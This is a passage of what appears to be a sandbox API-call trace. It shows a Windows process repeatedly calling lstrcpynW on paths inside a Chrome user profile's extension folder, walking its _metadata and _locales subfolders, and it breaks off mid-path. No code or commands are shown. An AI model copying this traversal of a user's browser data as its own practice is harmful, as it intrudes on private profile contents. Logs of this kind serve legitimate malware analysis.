Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata" [0111.451] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales" [0111.452] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW" [0111.452] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN" [0111.453] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi" [0111.453] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk" [0111.454] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr" [0111.454] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th" [0111.454] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv" [0111.455] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr" [0111.455] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl" [0111.456] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk" [0111.456] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru" [0111.457] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro" [0111.457] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT" [0111.457] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR" [0111.458] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl" [0111.458] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no" [0111.459] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl" [0111.459] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms" [0111.460] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv" [0111.460] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt" [0111.460] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko" [0111.461] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja" [0111.461] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it" [0111.462] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id" [0111.462] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu" [0111.462] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi" [0111.463] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he" [0111.463] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr" [0111.464] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil" [0111.464] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi" [0111.465] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et" [0111.465] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419" [0111.465] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es" [0111.466] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US" [0111.466] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB" [0111.467] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el" [0111.467] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de" [0111.467] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da" [0111.468] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs" [0111.468] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca" [0111.469] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 